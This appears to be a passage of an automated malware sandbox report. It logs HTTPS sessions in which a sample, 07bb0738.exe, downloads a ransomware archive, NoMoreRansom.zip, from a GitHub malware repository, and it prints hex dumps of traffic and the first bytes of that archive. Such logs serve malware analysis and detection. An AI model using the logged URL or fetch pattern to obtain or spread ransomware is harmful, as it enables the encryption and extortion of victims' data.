                                                                                                                                                    2022-09-29 12:58:54 UTC1362INData Raw: 7c f3 4c 99 98 b5 a9 f4 43 30 44 22 4d 41 9a fb 99 7a 03 7e d7 83 68 ed 8d 50 e0 d1 af 66 a8 0a 65 99 44 4c 1b 94 e4 d1 35 71 c0 0c 16 1c 19 33 d9 af be 3a fb 99 ba 96 de ba 1e bd fe d1 b9 1e f3 b5 08 b3 a2 ac 5d 61 06 84 b3 47 5d c8 f3 d9 12 e1 1f 62 f2 7f ee d5 e7 d9 58 e6 63 5e b8 6c ed f0 0f b0 a9 f4 bf 77 c8 54 b1 f9 26 3a 73 01 8c bc 48 87 9c 31 47 b9 1a 3c b8 61 18 bc 13 c9 f6 a6 fb 56 2d 77 4c b8 a0 26 33 65 42 d4 9c c2 57 f6 dc 18 8f 02 d2 89 0b 2f bf 70 db 58 2f 89 8d 10 7c e4 19 9f 66 8b 2c 86 48 77 ab 66 55 db b5 61 7c ba 51 87 10 76 0b b4 82 2a 38 d2 ed 0d 33 1e e6 2f f3 2f 91 28 63 1d 36 68 96 e5 e9 b9 34 83 ba 4a 4b 0e 9b fe c8 11 f6 ca 90 72 fc 99 b7 47 57 5a 02 0a 2d 62 ab de 88 46 be 43 25 92 c7 c9 c0 6b e4 cd 16 1e da 3d a6 66 57 0f 82
                                                                                                                                                    Data Ascii: |LC0D"MAz~hPfeDL5q3:]aG]bXc^lwT&:sH1G<aV-wL&3eBW/pX/|f,HwfUa|Qv*83//(c6h4JKrGWZ-bFC%k=fW
                                                                                                                                                    2022-09-29 12:58:54 UTC1363INData Raw: 94 42 4b cd 96 a8 d6 09 13 d9 09 1e 0f 37 cd 18 fd 12 66 bb 91 60 de d4 4f 69 62 1d 08 88 33 24 97 9b b1 18 8b 52 4c 8f 20 fd d1 95 cf d4 a3 3f bd 8d ae 2e 24 c5 f8 ab 9c fe 64 d1 88 a4 90 38 94 d6 e5 34 d5 a9 af 25 ab ea 70 72 74 12 2a b5 1e 65 cb a2 79 43 d4 2d 71 5a a2 b6 39 8c 01 29 5e b8 10 79 e1 2a 5e de 87 4c 63 f5 c7 43 f3 ce 4d 57 e2 9b ee 04 3d cb 0c 39 ee cf c9 90 18 f7 7e 4f b2 88 d1 c3 0c fc 14 e3 d4 87 e2 b7 0a f8 c1 a3 5f 3d 42 5e d9 14 4b f9 d5 b3 06 7b 10 42 15 fa ce ce 5c e6 58 8a b6 4a ec 06 b1 86 31 0f 0a d1 e4 60 c5 31 7a 4d d7 5a 27 56 64 90 0d 61 ae 82 a5 46 f7 54 10 d4 a1 32 20 0c 1e 97 75 e6 47 59 ae 66 b4 d3 9e 71 97 51 67 c1 a9 6c e8 0e 2c ea 0f ce f2 2b c2 37 f6 e8 56 6c d4 54 16 88 0b da 8c cc 62 6a 8d 07 4e 7b 2b d1 eb fe bd
                                                                                                                                                    Data Ascii: BK7f`Oib3$RL ?.$d84%prt*eyC-qZ9)^y*^LcCMW=9~O_=B^K{B\XJ1`1zMZ'VdaFT2 uGYfqQgl,+7VlTbjN{+
                                                                                                                                                    2022-09-29 12:58:54 UTC1365INData Raw: 22 49 30 4f 0c 42 80 b7 f7 19 9d be cc 46 67 7f b2 65 f9 08 7e 0e 18 7d 8d 31 0a 50 d3 2a 7a 72 40 3e a1 84 71 fe 44 6d 96 e0 79 79 49 23 40 1f 12 38 77 7a 90 66 b8 a5 f0 f6 b6 f1 99 8d 40 ce 58 c3 ab 6f 96 d3 4a a8 c2 fa 8e 23 9d e4 6c 1c 96 bd bc f5 8a 42 99 b7 d8 1e 53 64 14 a9 c0 de af 43 b8 0c 30 d1 e8 e7 24 71 f4 85 04 a7 96 2e 34 23 d3 49 ce 85 b6 8b 68 08 3d 0f 58 8d ac 88 7d d1 50 d6 ee d1 39 e7 33 d3 dc 4a 32 7f 44 cb 26 56 09 57 56 49 c6 e6 c7 78 25 5e a1 3d 29 95 05 ce 74 f9 73 23 41 35 a2 c4 e3 ad e1 c6 6b dd 46 b4 89 95 33 9f a9 72 fa 8e d4 41 8e 55 b4 f9 6f 4f 71 c3 c0 97 88 1b 31 2e a1 62 ec ac 7f fc f0 33 06 8e 13 d0 6c 84 92 a1 69 d1 ba 31 2d ff 3c 89 17 19 25 ce a1 c6 1a 70 ed 9d 9b 6d e3 68 cd 49 f0 db 43 15 5f ab 55 9a fb 6b 65 3d 86
                                                                                                                                                    Data Ascii: "I0OBFge~}1P*zr@>qDmyyI#@8wzf@XoJ#lBSdC0$q.4#Ih=X}P93J2D&VWVIx%^=)ts#A5kF3rAUoOq1.b3li1-<%pmhIC_Uke=
                                                                                                                                                    2022-09-29 12:58:54 UTC1366INData Raw: a5 5b 84 4f b9 5f 7f 21 0b aa 48 14 92 9f ee a9 a2 68 03 bf 5f 63 56 80 84 93 86 87 43 cc 56 2b 83 88 a1 8f f4 8e fb 24 12 8c 0e 29 e1 a6 45 89 ae bc 40 8a a8 12 b0 a1 81 e1 2b c9 7d b9 3a 10 85 d2 c8 50 81 71 e3 41 5a 78 e6 f1 6f 28 ca ce f5 fc 26 91 ae 88 1a a2 91 bb 4b ac 72 f6 f6 1d ea 4d 71 c8 31 91 63 ba 34 db 2d a3 46 d8 b6 5f ac 43 71 ef cb 5b 5d bf a6 5d 15 db a0 98 6b 68 93 c4 15 10 66 fb 40 e1 31 1a ad 53 6a 71 f9 91 64 18 90 db 92 bf 6e 0a f0 b6 a8 55 c3 aa 59 0d f6 0b ce f4 ff 47 21 73 43 df 0a 14 b6 d6 ea cb c4 b3 46 76 59 0c 31 f4 82 e4 70 04 d7 b6 b0 28 de 16 03 2f 47 51 98 35 16 d7 2a ea 83 88 c6 81 f2 ca 8d ff 03 e6 9d dd be f1 3b 5a d7 3f e4 28 7f d3 fd 10 0e de ee ce fc d6 f9 af 35 66 c8 63 ce 34 2d 1e 63 dd 1f 70 22 a1 78 f0 a8 77 e6
                                                                                                                                                    Data Ascii: [O_!Hh_cVCV+$)E@+}:PqAZxo(&KrMq1c4-F_Cq[]]khf@1SjqdnUYG!sCFvY1p(/GQ5*;Z?(5fc4-cp"xw
                                                                                                                                                    2022-09-29 12:58:54 UTC1367INData Raw: cb 69 06 43 75 c0 71 a4 bd cd eb cd f5 d7 d0 aa 7e 02 b4 bd ff a9 c1 e0 71 bb 06 ec 1a 5e fa 01 7e 5d 9c d5 ee 25 90 c8 0a f8 f7 5c f5 99 34 c0 e3 ba 5a ff 24 0d c6 be b5 4d 36 ec fd a4 c3 6d 94 6e 7c 43 0e 2d 61 a7 70 21 61 80 bc 33 3e 0e a6 14 ee c9 7d 06 d4 be 19 c6 3b 76 a0 3a e5 ed 0b 8e 5a 1c 0d 21 78 be ce b8 e4 85 bd 13 09 05 bf 9b 89 e5 9c c2 2d fd f3 bf 7a 70 10 57 fd 4d d8 48 ce fb 92 10 67 04 1e e8 08 c7 95 a5 5e e5 4b 55 61 f7 1a aa d1 40 e5 ef d5 b8 f0 3d 1b b3 14 7e 86 29 d9 d8 72 5d 09 5e 96 8f e1 c9 21 ed 50 e4 e1 db 86 27 4c b9 54 b5 8b e5 77 9f 12 5b 8d cc 83 4e 6c bf f9 10 a0 10 97 be e3 d9 39 b1 08 31 d8 b6 f7 8c ce f2 24 65 a1 12 5f 03 a7 0d e5 15 ce af 6c b1 ee e3 68 63 e4 58 c7 30 d2 4c 66 0a c8 dc da d0 e8 84 ac f6 cf af 62 77 b6
                                                                                                                                                    Data Ascii: iCuq~q^~]%\4Z$M6mn|C-ap!a3>};v:Z!x-zpWMHg^KUa@=~)r]^!P'LTw[Nl91$e_lhcX0Lfbw


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    33192.168.2.349724140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:58 UTC1369OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    34140.82.121.3443192.168.2.349724C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:58 UTC1369INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:05 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:58 UTC1369INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    35192.168.2.349725185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:58 UTC1371OUTGET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    36185.199.108.133443192.168.2.349725C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:58 UTC1371INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 938498
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "a8e6304ff5320ec60c4e2f8e3ebb31e42a5adf4691dfa4eaa6f24b4dad08bbfd"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: D4EA:67BC:3D674:FA8B9:63359346
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:58 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6930-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456339.823324,VS0,VE149
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: df81c47dc55aaf6afd55e0c6cdec5c6a70c34b87
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:03:58 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:58:58 UTC1372INData Raw: 50 4b 03 04 14 00 01 00 08 00 98 82 ba 4a dc 69 b2 15 46 51 0e 00 00 ca 15 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4e 6f 4d 6f 72 65 52 61 6e 73 6f 6d 2e 65 78 65 b5 26 50 b8 1f d7 f7 5c 00 a2 4a af d9 76 74 a7 44 28 27 ef 18 69 bb ab c2 21 d8 7d 8d cf 83 56 8f 2f be 64 10 fd 69 17 eb d0 5e f2 d1 6a a5 9a e0 56 c4 b3 e4 ff ef a6 06 ea d6 bb 64 6b 3f ea f9 6f 23 d2 9f e5 e4 cd 7d d2 36 bb 46 c8 f4 08 1a 00 0f 17 49 5a 2b cf 96 7e c2 48 0e 6c 80 6f ea ba 11 a3 fc ab 7a 93 b5 f5 72 91 10 54 4a a5 5e c7 31 ec 37 cb 13 62 26 42 d9 40 f7 43 ab dd a9 a1 a0 e4 29 c6 f9 df 33 34 5d 1a c8 97 96 7e cd dd d4 6d d2 f7 59 b8 fe 1d 7d fb 12 f3 50 a2 72 b6 cf dc 3e fb 7a ff 18 09 a8 c1 22 05 34 54 9a 3e dc 1b c6 15 06 cb f9 a0 a0 5c 0d b6 3f e9 b8 c9 45 cc d1 03
                                                                                                                                                    Data Ascii: PKJiFQEndermanch@NoMoreRansom.exe&P\JvtD('i!}V/di^jVdk?o#}6FIZ+~HlozrTJ^17b&B@C)34]~mY}Pr>z"4T>\?E
                                                                                                                                                    2022-09-29 12:58:58 UTC1373INData Raw: 8f 51 ef 9a 13 32 e0 6a a5 1c 6b 8d 46 dd 80 f7 0c e0 e9 06 3b cf b7 80 a4 34 00 f1 dd ce dd 89 6e 16 17 14 27 c1 30 7f 09 bb 51 a7 68 10 82 fe d7 fa 10 d7 6b 77 5b 29 43 95 99 55 67 17 40 c8 01 3f 1f af fd a3 06 32 78 b4 d9 6e 50 8a 94 c5 0b 1b 29 d4 e9 03 c6 25 75 0a 65 61 97 53 a3 e6 25 7f c9 41 49 8b f5 b4 52 ca 0e 29 28 09 b6 54 ce a0 07 26 20 4d 23 76 df 0f 91 b9 dd 85 a7 17 cc 9c 09 83 cd 3b cc 7f 75 86 42 7f 7c ae 89 e9 11 fe 37 49 60 9a 92 b3 e9 0a 85 c2 84 66 96 43 a0 08 e9 12 f1 86 29 d1 fd 6d 11 b2 72 9c 2c e1 7f 6c 2e 5d 33 f3 da 43 5a 42 44 78 67 70 a0 0c 88 27 21 85 23 32 c0 80 e8 60 89 cb e5 f9 0f 3a ef d7 cf c3 fe 77 54 63 2b 65 20 2c 6a f1 d5 6b 00 2b 21 1c 35 9c 2f ba 21 21 c4 b8 e5 2e 17 2f 63 72 e8 f1 e4 22 80 e9 03 f5 df 52 88 7c bf
                                                                                                                                                    Data Ascii: Q2jkF;4n'0Qhkw[)CUg@?2xnP)%ueaS%AIR)(T& M#v;uB|7I`fC)mr,l.]3CZBDxgp'!#2`:wTc+e ,jk+!5/!!./cr"R|
                                                                                                                                                    2022-09-29 12:58:58 UTC1375INData Raw: c9 bb 93 d4 21 ae db b3 7e f7 5d 47 1d 3b 97 c6 0c 89 72 5a 63 6f a4 f9 4a 0a 94 ef 4d 42 e8 5e 8e 00 62 2b 24 56 5f d6 79 ab 67 88 e8 da 2e 3b ca a5 49 ab c0 03 71 fd ef a2 3c c0 89 6b ba a7 75 69 60 86 e7 f2 75 60 d5 10 06 08 59 3e c8 98 76 f8 16 2b 63 32 36 e5 f8 a2 bd ad 58 26 0b 65 7d 72 07 a1 f3 cc e2 19 d8 1e 54 2e 04 34 9a ce 8b d9 ed 8f eb e7 f5 9d ef 34 87 81 3c 62 3d 4b e2 80 e7 c2 e4 13 fa bf 55 9c b9 2b df 54 c4 62 4d 80 3c 7a c7 7e ff d9 4c 54 8d df f4 12 1b ad ef 59 f6 52 09 e4 7f c1 17 57 82 07 2f 7b 30 82 e7 77 37 a0 2e 76 65 2c 9c f2 c4 f3 5a fd 0d 7d 42 bb 26 d7 c8 c9 2e 1f 03 4a 42 ba bf 24 d1 85 13 64 01 46 d0 04 24 ab 34 cd ae 7b 01 90 85 45 e9 07 65 96 ef 2a c6 5d 42 5a bc cd 5a 8d 1b 84 c2 03 d4 79 37 9f 3a 91 ec 39 7a 64 42 6a 97
                                                                                                                                                    Data Ascii: !~]G;rZcoJMB^b+$V_yg.;Iq<kui`u`Y>v+c26X&e}rT.44<b=KU+TbM<z~LTYRW/{0w7.ve,Z}B&.JB$dF$4{Ee*]BZZy7:9zdBj
                                                                                                                                                    2022-09-29 12:58:58 UTC1376INData Raw: 98 b9 e5 68 92 db 22 0b b1 fa 44 78 da 49 85 45 85 17 60 35 10 c6 09 55 93 f7 24 4f ea ee 81 7c 8c 8a 0e f9 8a 94 96 cd 94 70 2e ae 14 70 60 ca e9 b6 89 56 a9 e9 f6 9c ff f8 f1 93 80 46 9c 86 ef 5a 05 41 02 64 14 08 73 07 99 b9 97 1a 8c 78 9f d8 1a 0f 0a da c4 dd 91 36 30 11 a8 17 b2 cf 5c ff 1e 84 e9 7b 2d 26 93 dd 77 34 5b 6e 5f f7 5e 64 14 8d 31 57 21 c2 99 fe 03 87 2d 9f fd 7f 15 a6 c5 9d ba 81 6d a0 b9 d2 bc 29 81 a5 25 bf ce 3a 91 cd 44 61 c1 8d ef be 1d b7 20 69 6d 2c 9d d2 f0 cf 51 00 d4 2d 1d 5e c6 dd ac 4f 43 3e c1 12 31 b3 8d 39 e1 fb 85 2b 32 d7 65 0b 8c bb ef cb 71 4b fa ba 96 1c 1d 25 85 25 e2 28 4b 43 db 04 43 84 5a 53 94 88 f5 14 40 55 70 6d 3d 8c cc d2 bf 89 06 df 49 26 4f f6 ce f7 7f a1 77 f1 a1 43 2c 89 2c f3 78 57 95 25 cb 51 0f fb 57
                                                                                                                                                    Data Ascii: h"DxIE`5U$O|p.p`VFZAdsx60\{-&w4[n_^d1W!-m)%:Da im,Q-^OC>19+2eqK%%(KCCZS@Upm=I&OwC,,xW%QW
                                                                                                                                                    2022-09-29 12:58:58 UTC1377INData Raw: 4c 76 fd dc 1f 9a 93 13 0a be e6 c1 77 55 d5 4c c0 38 6f 8c 40 c0 46 87 2f 32 7a 6a b6 9c 83 80 6b 29 75 8c a9 89 78 27 0e a9 2a 7d 4d c0 31 0f 34 c2 33 f4 03 c1 78 34 7a 0b bf b8 b0 94 4a 9e 3d 62 a1 05 32 e7 2b db 0a c0 1b 75 0b 89 4e fa 4b 13 06 12 9b 96 4e d0 45 c7 df a3 c3 0c 5f d0 1c 2d 8b 06 7f af 9f e6 d5 09 fb 15 05 40 04 68 f7 4f 97 97 30 5c 58 00 71 1a 23 b6 b0 5e 81 e6 0d e6 ad 82 fc 3a ea 40 f8 07 87 6a 9a fe 1c 44 63 a1 ba 6e a0 ea 24 de 20 08 49 62 fd e7 ee e4 09 bf f2 b7 87 b8 a6 a1 3e 06 2f c7 47 c2 90 df 50 47 88 9e 31 a6 d4 2e 18 20 54 bc 4b 1f d8 c7 fb 93 31 4d 2b a2 62 5c e8 c0 10 33 e3 4b a4 c7 3b 3a d6 4e a7 9f 5e 17 18 a6 d8 fa 9a 2f b8 98 ad ee 89 e9 34 2d d5 e9 36 49 31 b2 be 37 82 42 1d 7a 28 0a 04 57 0d 33 9b c0 8d f5 7c 1f e5
                                                                                                                                                    Data Ascii: LvwUL8o@F/2zjk)ux'*}M143x4zJ=b2+uNKNE_-@hO0\Xq#^:@jDcn$ Ib>/GPG1. TK1M+b\3K;:N^/4-6I17Bz(W3|
                                                                                                                                                    2022-09-29 12:58:58 UTC1379INData Raw: 84 ba ea 78 a2 22 8b 60 1e 4a 78 a8 c8 05 7e fc 3d 96 4c 66 f6 62 40 6e 89 d1 60 55 13 9c b0 69 e8 fd 06 cd 85 a4 e8 29 16 10 7a 9b 1e 77 bc 36 f8 00 62 f9 c0 da b4 30 b5 2f 66 c5 6d 6f 91 b2 33 83 d1 11 17 64 1a a2 0d a8 65 fc 1c 59 0c e6 33 f5 2b 38 1c 84 be cf 4b 36 07 9c 7a de 66 d1 4b fc 4b 3d 99 b1 4b 75 18 f0 d2 2a 0c a2 15 f4 be 9f 26 a1 92 2a b7 73 47 29 1b 5e 40 52 d3 c4 2e a0 89 4f 24 8f ef a4 62 58 d1 56 01 c9 24 91 7a 6a b1 fc 02 93 6b 4e e8 7f 7e 4d 63 e0 b8 74 c6 6e 3f bc 05 a3 54 95 ad ee 20 3f 20 38 a0 74 7c 91 7c 86 e3 5c 8a 03 fd 88 f7 48 b3 1d 44 6d 9d 83 e6 04 6a 96 ae a4 7f 2a 01 ff ff fa c7 a4 50 a7 33 6c f2 f3 40 c3 3e 8c 47 d6 b0 bc dc 5b 83 20 92 6a 6d 13 de ec 5a 96 46 a6 7b 08 60 fc fb ad 5c d8 47 8f ef 26 ea 41 37 49 84 72 d9
                                                                                                                                                    Data Ascii: x"`Jx~=Lfb@n`Ui)zw6b0/fmo3deY3+8K6zfKK=Ku*&*sG)^@R.O$bXV$zjkN~Mctn?T ? 8t||\HDmj*P3l@>G[ jmZF{`\G&A7Ir
                                                                                                                                                    2022-09-29 12:58:58 UTC1380INData Raw: 9d 8b 6c 4d a1 e7 92 17 e9 e7 16 fd 24 fa 64 fc d4 91 c9 12 8c 1c 56 44 8b 30 53 5e 41 2e b6 2c d3 fb cb 49 e9 61 f1 b0 6a 49 59 c6 77 29 60 7f 35 f7 23 e0 90 58 d9 b5 9f 1b 22 1f 19 8b f3 77 33 9f 8b fc b6 7b 69 89 bd 69 42 65 b5 26 39 fc 1a e2 ff f2 19 cd 39 a4 c4 3f 5d b7 df 8d 32 e0 c4 ed bc 8c 76 70 e3 3f 51 1e c6 ec 23 69 f5 90 92 90 79 28 76 e4 da 91 8e 17 49 a2 b1 75 16 ee 69 ab 25 3a b0 ee aa 07 ee 81 c8 22 6e 65 38 52 bb a1 d7 ca a8 2c 24 e8 a0 14 98 8d 52 f8 c8 b4 f4 c9 0e d5 9a ba 66 50 b6 8d c3 95 78 79 b6 94 b0 4f 7c f1 f7 62 4a a8 63 89 78 40 98 fe f2 f9 72 17 9f 00 96 f7 76 03 37 58 7a 44 b9 58 85 77 92 6e 3e e4 96 ec 07 2d f7 4a f5 2c 6d cd 5e 92 e0 d5 b7 a8 62 4e bb 41 a3 da 7c ff 64 8f 2b 6f e6 bc 7d ac 7d 2b 45 e1 bc 38 c2 f6 45 62 c8
                                                                                                                                                    Data Ascii: lM$dVD0S^A.,IajIYw)`5#X"w3{iiBe&99?]2vp?Q#iy(vIui%:"ne8R,$RfPxyO|bJcx@rv7XzDXwn>-J,m^bNA|d+o}}+E8Eb
                                                                                                                                                    2022-09-29 12:58:58 UTC1381INData Raw: 67 54 d1 f2 15 cc 49 f1 b9 b7 d5 65 3d 3d c7 34 00 39 ac 3b 3a 26 d9 f6 20 ca 6b f2 26 40 8b bd 4f 85 9c 95 2a 0f 15 82 aa 2e 92 0e 04 75 a1 52 73 42 a5 c3 a3 0e 9b f4 94 74 a0 1c ea b4 0e 4d 3b 81 c0 30 94 c1 6d 4a ad e3 60 32 c0 97 7a 18 82 c1 bb 60 bb 36 47 c1 96 2a 51 c1 de 58 52 7d bb eb 6f 8f ef dc 64 64 75 d7 e9 f5 7c 94 90 2e 84 c2 68 98 43 d9 59 7c 7e 48 49 8c 2b 11 44 ac 39 11 16 b6 d7 40 80 2d 46 b5 8b 4f 0d 24 f8 dc b1 1a 14 13 a2 dc 76 97 57 0c 22 e8 ce 48 fe 19 e8 0e 8f 7c 32 d4 28 53 78 8c db a6 a3 c8 14 19 cb cc ce d8 02 56 d8 50 59 27 74 19 97 24 6f a8 51 5d 46 75 a4 68 87 2d 9a 71 e9 5b 6a 29 23 47 09 f1 42 39 5a 50 52 84 d3 c2 3b 77 b6 d6 19 bf 76 b7 d3 f1 07 cb 3b c3 1b 64 1d 5d fd a0 0f 7c 0e 9c f4 fb 0c 9a 7a 72 f3 89 92 8e 7b 65 42
                                                                                                                                                    Data Ascii: gTIe==49;:& k&@O*.uRsBtM;0mJ`2z`6G*QXR}oddu|.hCY|~HI+D9@-FO$vW"H|2(SxVPY't$oQ]Fuh-q[j)#GB9ZPR;wv;d]|zr{eB
                                                                                                                                                    2022-09-29 12:58:58 UTC1383INData Raw: 77 40 ae 70 db fc a9 f2 4d 66 58 c8 8e a6 06 ef 3c e8 40 61 45 4a d3 55 6c 06 87 de 09 27 71 80 ee ef 1f 72 d7 1f 02 9a d0 ca 1f e9 7e 8a 8a d0 69 37 66 2b bd d3 79 0a 28 47 98 d7 d4 dc a2 6c 48 05 85 06 93 42 03 e6 a2 99 fa 96 f8 39 c2 cf 91 b5 35 54 20 f5 7f f3 03 87 b1 48 88 f7 f3 87 54 a1 71 fc e8 3d 51 1e d5 87 c8 b9 06 6b c6 9c 04 89 45 75 b7 b9 b8 b8 20 cf a2 1a 78 13 47 bf ec d1 b5 ed d8 a3 3f 7a a5 8b 1c 3f 69 92 69 5b 97 7f 49 67 ba b3 2c 33 68 0b 30 b8 fc b1 f3 ac 98 12 c9 05 54 ae 4a 8c e0 84 9c 5d 78 68 1e 63 0e 32 fb 90 4e 81 c0 d9 d8 66 e6 78 bb d5 b5 8a 58 50 8a 48 32 bd 25 e7 a3 0b 58 29 65 ed 02 5d 53 79 0a 0b 49 bf 5d 01 79 c7 41 f3 76 78 ec bd 62 6b 0e 06 ef 76 cb 67 14 4a 96 b8 8d 37 c2 09 cc 5f 6f 32 8e fb 5e 33 e7 00 21 a3 a2 20 e5
                                                                                                                                                    Data Ascii: w@pMfX<@aEJUl'qr~i7f+y(GlHB95T HTq=QkEu xG?z?ii[Ig,3h0TJ]xhc2NfxXPH2%X)e]SyI]yAvxbkvgJ7_o2^3!
                                                                                                                                                    2022-09-29 12:58:58 UTC1384INData Raw: 05 a5 75 16 71 88 7f fb 06 ca 60 ae 74 34 65 f6 7b ab 2c 1d 19 ab 91 9c d6 5e 4a 3e f7 ed 34 e2 90 4e 8b fe f2 d3 1d cd c9 b9 3e cb f5 21 4f 77 e2 70 2e 6d 09 50 fb d2 f1 2e f9 f8 a8 70 c9 0f a8 a2 c6 b1 6d f2 d8 ad 01 59 13 4e 95 d6 1e 31 cc bd 2d 44 a8 4c 78 a3 73 87 6a fc dd 4f cb 61 fb 07 73 7c e6 09 ed 28 77 42 ff c0 b3 88 80 b6 5e d0 c1 cf af 6b d8 05 e3 a6 38 8f c0 51 bd 90 be 90 72 bc 14 6e 4e 10 3a c4 ca 79 73 33 44 97 b1 ac b9 31 ae 3e e5 a4 15 22 36 de 86 89 50 49 06 11 ca ea c0 11 23 72 4c 4b 4f 5c 0a cb cd 1a 76 ee 49 24 9c 42 4e f4 4b 5b a2 c8 d1 72 26 4c ff 53 c9 d1 9b bf 43 d8 21 7a da 31 8d 68 97 ed 78 c1 cf 9e 3a 3b 80 0d 64 17 76 a3 10 a8 92 12 7e a8 fe 40 ed f0 3c 6e f4 e5 70 39 21 a9 c3 32 1e 34 50 54 68 6e f1 4d ec 7b f7 9e ae 0f a9
                                                                                                                                                    Data Ascii: uq`t4e{,^J>4N>!Owp.mP.pmYN1-DLxsjOas|(wB^k8QrnN:ys3D1>"6PI#rLKO\vI$BNK[r&LSC!z1hx:;dv~@<np9!24PThnM{
                                                                                                                                                    2022-09-29 12:58:58 UTC1385INData Raw: ba 8f 38 62 51 a4 46 69 23 ea bd 56 15 43 98 09 b9 c1 dc 46 6a a9 90 5c 94 9c 77 2b 1b 9f 3a bf 1b 01 22 42 1b 22 ea b9 32 02 cc b4 11 54 4f 09 df 30 53 2b 4b 41 0f 5f ca b3 0f e7 23 ab ad 0a 41 c0 b5 dd c1 d8 83 ac bc cd 27 d0 ec 95 f7 b6 b4 ff 16 53 a7 9e f9 d7 0d d4 c5 70 9c d5 33 bc dc 7f 1c 9d 21 eb eb 93 dd 1b b1 fe 89 98 dd f1 d8 60 23 49 ff 25 c6 ef 65 b8 f0 85 04 f5 4e b4 38 bb 85 5a 01 61 c0 36 c5 04 da 25 26 dc d2 4c ba ff 1c 30 5c 62 a0 07 80 c6 97 46 6a 02 14 0a 49 41 ea 62 3e 3c 70 ba 2f fa 3f 44 8c 12 66 66 87 d7 47 97 7f 6b 68 19 5a 90 80 20 20 bf 0f 57 b2 c9 c0 9e 02 30 28 01 13 63 ee 89 22 b8 5f 8d 18 94 eb d4 2d c7 ee da 96 8b b3 66 8d 43 f7 31 87 ae d4 e8 74 6c 65 e9 07 32 43 a6 91 02 6a 06 c1 93 52 9c 77 ea 00 53 e3 a0 6e fb 18 a6 4c
                                                                                                                                                    Data Ascii: 8bQFi#VCFj\w+:"B"2TO0S+KA_#A'Sp3!`#I%eN8Za6%&L0\bFjIAb><p/?DffGkhZ W0(c"_-fC1tle2CjRwSnL
